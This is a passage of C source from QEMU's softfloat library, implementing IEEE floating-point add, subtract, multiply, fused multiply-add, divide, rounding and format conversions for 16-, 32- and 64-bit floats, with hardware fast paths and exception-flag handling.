*/ float16 QEMU_FLATTEN float16_add(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, false, status); return float16_round_pack_canonical(pr, status); } float16 QEMU_FLATTEN float16_sub(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, true, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_addsub(float32 a, float32 b, bool subtract, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, subtract, status); return float32_round_pack_canonical(pr, status); } static inline float32 soft_f32_add(float32 a, float32 b, float_status *status) { return soft_f32_addsub(a, b, false, status); } static inline float32 soft_f32_sub(float32 a, float32 b, float_status *status) { return soft_f32_addsub(a, b, true, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_addsub(float64 a, float64 b, bool subtract, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = addsub_floats(pa, pb, subtract, status); return float64_round_pack_canonical(pr, status); } static inline float64 soft_f64_add(float64 a, float64 b, float_status *status) { return soft_f64_addsub(a, b, false, status); } static inline float64 soft_f64_sub(float64 a, float64 b, float_status *status) { return soft_f64_addsub(a, b, true, status); } static float hard_f32_add(float a, float b) { return a + b; } static float hard_f32_sub(float a, float b) { return a - b; } static double hard_f64_add(double a, double b) { return a + b; } static double hard_f64_sub(double a, double b) { return a - b; } static bool f32_addsub_post(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return !(fpclassify(a.h) == FP_ZERO && fpclassify(b.h) == FP_ZERO); } return !(float32_is_zero(a.s) && float32_is_zero(b.s)); } static bool f64_addsub_post(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return !(fpclassify(a.h) == FP_ZERO && fpclassify(b.h) == FP_ZERO); } else { return !(float64_is_zero(a.s) && float64_is_zero(b.s)); } } static float32 float32_addsub(float32 a, float32 b, float_status *s, hard_f32_op2_fn hard, soft_f32_op2_fn soft) { return float32_gen2(a, b, s, hard, soft, f32_is_zon2, f32_addsub_post, NULL, NULL); } static float64 float64_addsub(float64 a, float64 b, float_status *s, hard_f64_op2_fn hard, soft_f64_op2_fn soft) { return float64_gen2(a, b, s, hard, soft, f64_is_zon2, f64_addsub_post, NULL, NULL); } float32 QEMU_FLATTEN float32_add(float32 a, float32 b, float_status *s) { return float32_addsub(a, b, s, hard_f32_add, soft_f32_add); } float32 QEMU_FLATTEN float32_sub(float32 a, float32 b, float_status *s) { return float32_addsub(a, b, s, hard_f32_sub, soft_f32_sub); } float64 QEMU_FLATTEN float64_add(float64 a, float64 b, float_status *s) { return float64_addsub(a, b, s, hard_f64_add, soft_f64_add); } float64 QEMU_FLATTEN float64_sub(float64 a, float64 b, float_status *s) { return float64_addsub(a, b, s, hard_f64_sub, soft_f64_sub); } /* * Returns the result of multiplying the floating-point values `a' and * `b'. 
The operation is performed according to the IEC/IEEE Standard * for Binary Floating-Point Arithmetic. */ static FloatParts mul_floats(FloatParts a, FloatParts b, float_status *s) { bool sign = a.sign ^ b.sign; if (a.cls == float_class_normal && b.cls == float_class_normal) { uint64_t hi, lo; int exp = a.exp + b.exp; mul64To128(a.frac, b.frac, &hi, &lo); shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); if (lo & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(lo, 1, &lo); exp += 1; } /* Re-use a */ a.exp = exp; a.sign = sign; a.frac = lo; return a; } /* handle all the NaN cases */ if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } /* Inf * Zero == NaN */ if ((a.cls == float_class_inf && b.cls == float_class_zero) || (a.cls == float_class_zero && b.cls == float_class_inf)) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } /* Multiply by 0 or Inf */ if (a.cls == float_class_inf || a.cls == float_class_zero) { a.sign = sign; return a; } if (b.cls == float_class_inf || b.cls == float_class_zero) { b.sign = sign; return b; } g_assert_not_reached(); return a; } float16 QEMU_FLATTEN float16_mul(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_mul(float32 a, float32 b, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_mul(float64 a, float64 b, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = mul_floats(pa, pb, status); return float64_round_pack_canonical(pr, status); } static float hard_f32_mul(float a, float b) { return a * b; } static double hard_f64_mul(double a, double b) { return a * b; } static bool f32_mul_fast_test(union_float32 a, union_float32 b) { return float32_is_zero(a.s) || float32_is_zero(b.s); } static bool f64_mul_fast_test(union_float64 a, union_float64 b) { return float64_is_zero(a.s) || float64_is_zero(b.s); } static float32 f32_mul_fast_op(float32 a, float32 b, float_status *s) { bool signbit = float32_is_neg(a) ^ float32_is_neg(b); return float32_set_sign(float32_zero, signbit); } static float64 f64_mul_fast_op(float64 a, float64 b, float_status *s) { bool signbit = float64_is_neg(a) ^ float64_is_neg(b); return float64_set_sign(float64_zero, signbit); } float32 QEMU_FLATTEN float32_mul(float32 a, float32 b, float_status *s) { return float32_gen2(a, b, s, hard_f32_mul, soft_f32_mul, f32_is_zon2, NULL, f32_mul_fast_test, f32_mul_fast_op); } float64 QEMU_FLATTEN float64_mul(float64 a, float64 b, float_status *s) { return float64_gen2(a, b, s, hard_f64_mul, soft_f64_mul, f64_is_zon2, NULL, f64_mul_fast_test, f64_mul_fast_op); } /* * Returns the result of multiplying the floating-point values `a' and * `b' then adding 'c', with no intermediate rounding step after the * multiplication. The operation is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic 754-2008. * The flags argument allows the caller to select negation of the * addend, the intermediate product, or the final result. 
(The * difference between this and having the caller do a separate * negation is that negating externally will flip the sign bit on * NaNs.) */ static FloatParts muladd_floats(FloatParts a, FloatParts b, FloatParts c, int flags, float_status *s) { bool inf_zero = ((1 << a.cls) | (1 << b.cls)) == ((1 << float_class_inf) | (1 << float_class_zero)); bool p_sign; bool sign_flip = flags & float_muladd_negate_result; FloatClass p_class; uint64_t hi, lo; int p_exp; /* It is implementation-defined whether the cases of (0,inf,qnan) * and (inf,0,qnan) raise InvalidOperation or not (and what QNaN * they return if they do), so we have to hand this information * off to the target-specific pick-a-NaN routine. */ if (is_nan(a.cls) || is_nan(b.cls) || is_nan(c.cls)) { return pick_nan_muladd(a, b, c, inf_zero, s); } if (inf_zero) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } if (flags & float_muladd_negate_c) { c.sign ^= 1; } p_sign = a.sign ^ b.sign; if (flags & float_muladd_negate_product) { p_sign ^= 1; } if (a.cls == float_class_inf || b.cls == float_class_inf) { p_class = float_class_inf; } else if (a.cls == float_class_zero || b.cls == float_class_zero) { p_class = float_class_zero; } else { p_class = float_class_normal; } if (c.cls == float_class_inf) { if (p_class == float_class_inf && p_sign != c.sign) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } else { a.cls = float_class_inf; a.sign = c.sign ^ sign_flip; return a; } } if (p_class == float_class_inf) { a.cls = float_class_inf; a.sign = p_sign ^ sign_flip; return a; } if (p_class == float_class_zero) { if (c.cls == float_class_zero) { if (p_sign != c.sign) { p_sign = s->float_rounding_mode == float_round_down; } c.sign = p_sign; } else if (flags & float_muladd_halve_result) { c.exp -= 1; } c.sign ^= sign_flip; return c; } /* a & b should be normals now... */ assert(a.cls == float_class_normal && b.cls == float_class_normal); p_exp = a.exp + b.exp; /* Multiply of 2 62-bit numbers produces a (2*62) == 124-bit * result. 
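 * (Illustrative check: both fractions carry the implicit bit at position
 * 62, so for 1.0 * 1.0 each frac is 1ull << 62 and mul64To128 yields
 * hi:lo == 1 << 124, i.e. hi == 1ull << 60 and lo == 0.)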
*/ mul64To128(a.frac, b.frac, &hi, &lo); /* binary point now at bit 124 */ /* check for overflow */ if (hi & (1ULL << (DECOMPOSED_BINARY_POINT * 2 + 1 - 64))) { shift128RightJamming(hi, lo, 1, &hi, &lo); p_exp += 1; } /* + add/sub */ if (c.cls == float_class_zero) { /* move binary point back to 62 */ shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); } else { int exp_diff = p_exp - c.exp; if (p_sign == c.sign) { /* Addition */ if (exp_diff <= 0) { shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT - exp_diff, &hi, &lo); lo += c.frac; p_exp = c.exp; } else { uint64_t c_hi, c_lo; /* shift c to the same binary point as the product (124) */ c_hi = c.frac >> 2; c_lo = 0; shift128RightJamming(c_hi, c_lo, exp_diff, &c_hi, &c_lo); add128(hi, lo, c_hi, c_lo, &hi, &lo); /* move binary point back to 62 */ shift128RightJamming(hi, lo, DECOMPOSED_BINARY_POINT, &hi, &lo); } if (lo & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(lo, 1, &lo); p_exp += 1; } } else { /* Subtraction */ uint64_t c_hi, c_lo; /* make C binary point match product at bit 124 */ c_hi = c.frac >> 2; c_lo = 0; if (exp_diff <= 0) { shift128RightJamming(hi, lo, -exp_diff, &hi, &lo); if (exp_diff == 0 && (hi > c_hi || (hi == c_hi && lo >= c_lo))) { sub128(hi, lo, c_hi, c_lo, &hi, &lo); } else { sub128(c_hi, c_lo, hi, lo, &hi, &lo); p_sign ^= 1; p_exp = c.exp; } } else { shift128RightJamming(c_hi, c_lo, exp_diff, &c_hi, &c_lo); sub128(hi, lo, c_hi, c_lo, &hi, &lo); } if (hi == 0 && lo == 0) { a.cls = float_class_zero; a.sign = s->float_rounding_mode == float_round_down; a.sign ^= sign_flip; return a; } else { int shift; if (hi != 0) { shift = clz64(hi); } else { shift = clz64(lo) + 64; } /* Normalizing to a binary point of 124 is the correct adjust for the exponent. However since we're shifting, we might as well put the binary point back at 62 where we really want it. Therefore shift as if we're leaving 1 bit at the top of the word, but adjust the exponent as if we're leaving 3 bits. 
*/ shift -= 1; if (shift >= 64) { lo = lo << (shift - 64); } else { hi = (hi << shift) | (lo >> (64 - shift)); lo = hi | ((lo << shift) != 0); } p_exp -= shift - 2; } } } if (flags & float_muladd_halve_result) { p_exp -= 1; } /* finally prepare our result */ a.cls = float_class_normal; a.sign = p_sign ^ sign_flip; a.exp = p_exp; a.frac = lo; return a; } float16 QEMU_FLATTEN float16_muladd(float16 a, float16 b, float16 c, int flags, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pc = float16_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_muladd(float32 a, float32 b, float32 c, int flags, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pc = float32_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_muladd(float64 a, float64 b, float64 c, int flags, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pc = float64_unpack_canonical(c, status); FloatParts pr = muladd_floats(pa, pb, pc, flags, status); return float64_round_pack_canonical(pr, status); } static bool force_soft_fma; float32 QEMU_FLATTEN float32_muladd(float32 xa, float32 xb, float32 xc, int flags, float_status *s) { union_float32 ua, ub, uc, ur; ua.s = xa; ub.s = xb; uc.s = xc; if (unlikely(!can_use_fpu(s))) { goto soft; } if (unlikely(flags & float_muladd_halve_result)) { goto soft; } float32_input_flush3(&ua.s, &ub.s, &uc.s, s); if (unlikely(!f32_is_zon3(ua, ub, uc))) { goto soft; } if (unlikely(force_soft_fma)) { goto soft; } /* * When (a || b) == 0, there's no need to check for under/over flow, * since we know the addend is (normal || 0) and the product is 0. */ if (float32_is_zero(ua.s) || float32_is_zero(ub.s)) { union_float32 up; bool prod_sign; prod_sign = float32_is_neg(ua.s) ^ float32_is_neg(ub.s); prod_sign ^= !!(flags & float_muladd_negate_product); up.s = float32_set_sign(float32_zero, prod_sign); if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = up.h + uc.h; } else { union_float32 ua_orig = ua; union_float32 uc_orig = uc; if (flags & float_muladd_negate_product) { ua.h = -ua.h; } if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = fmaf(ua.h, ub.h, uc.h); if (unlikely(f32_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabsf(ur.h) <= FLT_MIN)) { ua = ua_orig; uc = uc_orig; goto soft; } } if (flags & float_muladd_negate_result) { return float32_chs(ur.s); } return ur.s; soft: return soft_f32_muladd(ua.s, ub.s, uc.s, flags, s); } float64 QEMU_FLATTEN float64_muladd(float64 xa, float64 xb, float64 xc, int flags, float_status *s) { union_float64 ua, ub, uc, ur; ua.s = xa; ub.s = xb; uc.s = xc; if (unlikely(!can_use_fpu(s))) { goto soft; } if (unlikely(flags & float_muladd_halve_result)) { goto soft; } float64_input_flush3(&ua.s, &ub.s, &uc.s, s); if (unlikely(!f64_is_zon3(ua, ub, uc))) { goto soft; } if (unlikely(force_soft_fma)) { goto soft; } /* * When (a || b) == 0, there's no need to check for under/over flow, * since we know the addend is (normal || 0) and the product is 0. 
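 * (The explicit up.h + uc.h below also produces the IEEE-correct sign when
 * both terms are zeros: under round-to-nearest-even, which can_use_fpu()
 * guarantees here, -0.0 + +0.0 == +0.0.)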
*/ if (float64_is_zero(ua.s) || float64_is_zero(ub.s)) { union_float64 up; bool prod_sign; prod_sign = float64_is_neg(ua.s) ^ float64_is_neg(ub.s); prod_sign ^= !!(flags & float_muladd_negate_product); up.s = float64_set_sign(float64_zero, prod_sign); if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = up.h + uc.h; } else { union_float64 ua_orig = ua; union_float64 uc_orig = uc; if (flags & float_muladd_negate_product) { ua.h = -ua.h; } if (flags & float_muladd_negate_c) { uc.h = -uc.h; } ur.h = fma(ua.h, ub.h, uc.h); if (unlikely(f64_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabs(ur.h) <= DBL_MIN)) { ua = ua_orig; uc = uc_orig; goto soft; } } if (flags & float_muladd_negate_result) { return float64_chs(ur.s); } return ur.s; soft: return soft_f64_muladd(ua.s, ub.s, uc.s, flags, s); } /* * Returns the result of dividing the floating-point value `a' by the * corresponding value `b'. The operation is performed according to * the IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts div_floats(FloatParts a, FloatParts b, float_status *s) { bool sign = a.sign ^ b.sign; if (a.cls == float_class_normal && b.cls == float_class_normal) { uint64_t n0, n1, q, r; int exp = a.exp - b.exp; /* * We want a 2*N / N-bit division to produce exactly an N-bit * result, so that we do not lose any precision and so that we * do not have to renormalize afterward. If A.frac < B.frac, * then division would produce an (N-1)-bit result; shift A left * by one to produce an N-bit result, and decrement the * exponent to match. * * The udiv_qrnnd algorithm that we're using requires normalization, * i.e. the msb of the denominator must be set. Since we know that * DECOMPOSED_BINARY_POINT is msb-1, the inputs must be shifted left * by one (more), and the remainder must be shifted right by one. */ if (a.frac < b.frac) { exp -= 1; shift128Left(0, a.frac, DECOMPOSED_BINARY_POINT + 2, &n1, &n0); } else { shift128Left(0, a.frac, DECOMPOSED_BINARY_POINT + 1, &n1, &n0); } q = udiv_qrnnd(&r, n1, n0, b.frac << 1); /* * Set lsb if there is a remainder, to set inexact. * As mentioned above, to find the actual value of the remainder we * would need to shift right, but (1) we are only concerned about * non-zero-ness, and (2) the remainder will always be even because * both inputs to the division primitive are even.
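 * (Illustrative check: for 1.0 / 1.0, a.frac == b.frac == 1ull << 62, so
 * n1:n0 == 1 << 125 and the divisor is 1ull << 63; udiv_qrnnd then returns
 * q == 1ull << 62, exactly DECOMPOSED_IMPLICIT_BIT, with r == 0.)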
*/ a.frac = q | (r != 0); a.sign = sign; a.exp = exp; return a; } /* handle all the NaN cases */ if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } /* 0/0 or Inf/Inf */ if (a.cls == b.cls && (a.cls == float_class_inf || a.cls == float_class_zero)) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } /* Inf / x or 0 / x */ if (a.cls == float_class_inf || a.cls == float_class_zero) { a.sign = sign; return a; } /* Div 0 => Inf */ if (b.cls == float_class_zero) { s->float_exception_flags |= float_flag_divbyzero; a.cls = float_class_inf; a.sign = sign; return a; } /* Div by Inf */ if (b.cls == float_class_inf) { a.cls = float_class_zero; a.sign = sign; return a; } g_assert_not_reached(); return a; } float16 float16_div(float16 a, float16 b, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pb = float16_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_div(float32 a, float32 b, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pb = float32_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_div(float64 a, float64 b, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pb = float64_unpack_canonical(b, status); FloatParts pr = div_floats(pa, pb, status); return float64_round_pack_canonical(pr, status); } static float hard_f32_div(float a, float b) { return a / b; } static double hard_f64_div(double a, double b) { return a / b; } static bool f32_div_pre(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && fpclassify(b.h) == FP_NORMAL; } return float32_is_zero_or_normal(a.s) && float32_is_normal(b.s); } static bool f64_div_pre(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && fpclassify(b.h) == FP_NORMAL; } return float64_is_zero_or_normal(a.s) && float64_is_normal(b.s); } static bool f32_div_post(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { return fpclassify(a.h) != FP_ZERO; } return !float32_is_zero(a.s); } static bool f64_div_post(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return fpclassify(a.h) != FP_ZERO; } return !float64_is_zero(a.s); } float32 QEMU_FLATTEN float32_div(float32 a, float32 b, float_status *s) { return float32_gen2(a, b, s, hard_f32_div, soft_f32_div, f32_div_pre, f32_div_post, NULL, NULL); } float64 QEMU_FLATTEN float64_div(float64 a, float64 b, float_status *s) { return float64_gen2(a, b, s, hard_f64_div, soft_f64_div, f64_div_pre, f64_div_post, NULL, NULL); } /* * Float to Float conversions * * Returns the result of converting one float format to another. The * conversion is performed according to the IEC/IEEE Standard for * Binary Floating-Point Arithmetic. * * The float_to_float helper only needs to take care of raising * invalid exceptions and handling the conversion on NaNs. */ static FloatParts float_to_float(FloatParts a, const FloatFmt *dstf, float_status *s) { if (dstf->arm_althp) { switch (a.cls) { case float_class_qnan: case float_class_snan: /* There is no NaN in the destination format. Raise Invalid * and return a zero with the sign of the input NaN. 
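             *
             * E.g. converting any negative float32 NaN to an
             * Alternative Half Precision float16 yields -0.0 (and a
             * positive NaN yields +0.0), with float_flag_invalid
             * raised in both cases.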
*/ s->float_exception_flags |= float_flag_invalid; a.cls = float_class_zero; a.frac = 0; a.exp = 0; break; case float_class_inf: /* There is no Inf in the destination format. Raise Invalid * and return the maximum normal with the correct sign. */ s->float_exception_flags |= float_flag_invalid; a.cls = float_class_normal; a.exp = dstf->exp_max; a.frac = ((1ull << dstf->frac_size) - 1) << dstf->frac_shift; break; default: break; } } else if (is_nan(a.cls)) { if (is_snan(a.cls)) { s->float_exception_flags |= float_flag_invalid; a = parts_silence_nan(a, s); } if (s->default_nan_mode) { return parts_default_nan(s); } } return a; } float32 float16_to_float32(float16 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float16a_unpack_canonical(a, s, fmt16); FloatParts pr = float_to_float(p, &float32_params, s); return float32_round_pack_canonical(pr, s); } float64 float16_to_float64(float16 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float16a_unpack_canonical(a, s, fmt16); FloatParts pr = float_to_float(p, &float64_params, s); return float64_round_pack_canonical(pr, s); } float16 float32_to_float16(float32 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float32_unpack_canonical(a, s); FloatParts pr = float_to_float(p, fmt16, s); return float16a_round_pack_canonical(pr, s, fmt16); } static float64 QEMU_SOFTFLOAT_ATTR soft_float32_to_float64(float32 a, float_status *s) { FloatParts p = float32_unpack_canonical(a, s); FloatParts pr = float_to_float(p, &float64_params, s); return float64_round_pack_canonical(pr, s); } float64 float32_to_float64(float32 a, float_status *s) { if (likely(float32_is_normal(a))) { /* Widening conversion can never produce inexact results. */ union_float32 uf; union_float64 ud; uf.s = a; ud.h = uf.h; return ud.s; } else if (float32_is_zero(a)) { return float64_set_sign(float64_zero, float32_is_neg(a)); } else { return soft_float32_to_float64(a, s); } } float16 float64_to_float16(float64 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float64_unpack_canonical(a, s); FloatParts pr = float_to_float(p, fmt16, s); return float16a_round_pack_canonical(pr, s, fmt16); } float32 float64_to_float32(float64 a, float_status *s) { FloatParts p = float64_unpack_canonical(a, s); FloatParts pr = float_to_float(p, &float32_params, s); return float32_round_pack_canonical(pr, s); } /* * Rounds the floating-point value `a' to an integer, and returns the * result as a floating-point value. The operation is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic. 
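 *
 * A minimal usage sketch (illustrative values; `st' is caller-owned):
 *
 *     float_status st = { 0 };
 *     st.float_rounding_mode = float_round_nearest_even;
 *     float64 x = make_float64(0x4004000000000000ULL);   (x is 2.5)
 *     float64 r = float64_round_to_int(x, &st);   (r is 2.0, ties-to-even;
 *                                                  inexact is raised)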
*/ static FloatParts round_to_int(FloatParts a, int rmode, int scale, float_status *s) { switch (a.cls) { case float_class_qnan: case float_class_snan: return return_nan(a, s); case float_class_zero: case float_class_inf: /* already "integral" */ break; case float_class_normal: scale = MIN(MAX(scale, -0x10000), 0x10000); a.exp += scale; if (a.exp >= DECOMPOSED_BINARY_POINT) { /* already integral */ break; } if (a.exp < 0) { bool one = false; /* all fractional */ s->float_exception_flags |= float_flag_inexact; switch (rmode) { case float_round_nearest_even: one = a.exp == -1 && a.frac > DECOMPOSED_IMPLICIT_BIT; break; case float_round_ties_away: one = a.exp == -1 && a.frac >= DECOMPOSED_IMPLICIT_BIT; break; case float_round_to_zero: one = false; break; case float_round_up: one = !a.sign; break; case float_round_down: one = a.sign; break; case float_round_to_odd: one = true; break; default: g_assert_not_reached(); break; } if (one) { a.frac = DECOMPOSED_IMPLICIT_BIT; a.exp = 0; } else { a.cls = float_class_zero; } } else { uint64_t frac_lsb = DECOMPOSED_IMPLICIT_BIT >> a.exp; uint64_t frac_lsbm1 = frac_lsb >> 1; uint64_t rnd_even_mask = (frac_lsb - 1) | frac_lsb; uint64_t rnd_mask = rnd_even_mask >> 1; uint64_t inc = 0; switch (rmode) { case float_round_nearest_even: inc = ((a.frac & rnd_even_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_ties_away: inc = frac_lsbm1; break; case float_round_to_zero: inc = 0; break; case float_round_up: inc = a.sign ? 0 : rnd_mask; break; case float_round_down: inc = a.sign ? rnd_mask : 0; break; case float_round_to_odd: inc = a.frac & frac_lsb ? 0 : rnd_mask; break; default: g_assert_not_reached(); break; } if (a.frac & rnd_mask) { s->float_exception_flags |= float_flag_inexact; a.frac += inc; a.frac &= ~rnd_mask; if (a.frac & DECOMPOSED_OVERFLOW_BIT) { a.frac >>= 1; a.exp++; } } } break; default: g_assert_not_reached(); } return a; } float16 float16_round_to_int(float16 a, float_status *s) { FloatParts pa = float16_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float16_round_pack_canonical(pr, s); } float32 float32_round_to_int(float32 a, float_status *s) { FloatParts pa = float32_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float32_round_pack_canonical(pr, s); } float64 float64_round_to_int(float64 a, float_status *s) { FloatParts pa = float64_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float64_round_pack_canonical(pr, s); } /* * Returns the result of converting the floating-point value `a' to * the two's complement integer format. The conversion is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic---which means in particular that the conversion is * rounded according to the current rounding mode. If `a' is a NaN, * the largest positive integer is returned. Otherwise, if the * conversion overflows, the largest integer with the same sign as `a' * is returned. */ static int64_t round_to_int_and_pack(FloatParts in, int rmode, int scale, int64_t min, int64_t max, float_status *s) { uint64_t r; int orig_flags = get_float_exception_flags(s); FloatParts p = round_to_int(in, rmode, scale, s); switch (p.cls) { case float_class_snan: case float_class_qnan: s->float_exception_flags = orig_flags | float_flag_invalid; return max; case float_class_inf: s->float_exception_flags = orig_flags | float_flag_invalid; return p.sign ? 
min : max; case float_class_zero: return 0; case float_class_normal: if (p.exp < DECOMPOSED_BINARY_POINT) { r = p.frac >> (DECOMPOSED_BINARY_POINT - p.exp); } else if (p.exp - DECOMPOSED_BINARY_POINT < 2) { r = p.frac << (p.exp - DECOMPOSED_BINARY_POINT); } else { r = UINT64_MAX; } if (p.sign) { #ifdef _MSC_VER if (r <= 0ULL - (uint64_t)min) { return (0ULL - r); #else if (r <= -(uint64_t) min) { return -r; #endif } else { s->float_exception_flags = orig_flags | float_flag_invalid; return min; } } else { if (r <= max) { return r; } else { s->float_exception_flags = orig_flags | float_flag_invalid; return max; } } default: g_assert_not_reached(); return max; } } int16_t float16_to_int16_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float16_to_int32_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float16_to_int64_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float32_to_int16_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float32_to_int32_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float32_to_int64_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float64_to_int16_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float64_to_int32_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float64_to_int64_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float16_to_int16(float16 a, float_status *s) { return float16_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float16_to_int32(float16 a, float_status *s) { return float16_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float16_to_int64(float16 a, float_status *s) { return float16_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float32_to_int16(float32 a, float_status *s) { return float32_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float32_to_int32(float32 a, float_status *s) { return float32_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float32_to_int64(float32 a, float_status *s) { return float32_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float64_to_int16(float64 a, float_status *s) { return float64_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float64_to_int32(float64 a, float_status *s) { return float64_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float64_to_int64(float64 a, float_status *s) { return float64_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float16_to_int16_round_to_zero(float16 a, float_status *s) { return float16_to_int16_scalbn(a, 
float_round_to_zero, 0, s);
}

int32_t float16_to_int32_round_to_zero(float16 a, float_status *s)
{
    return float16_to_int32_scalbn(a, float_round_to_zero, 0, s);
}

int64_t float16_to_int64_round_to_zero(float16 a, float_status *s)
{
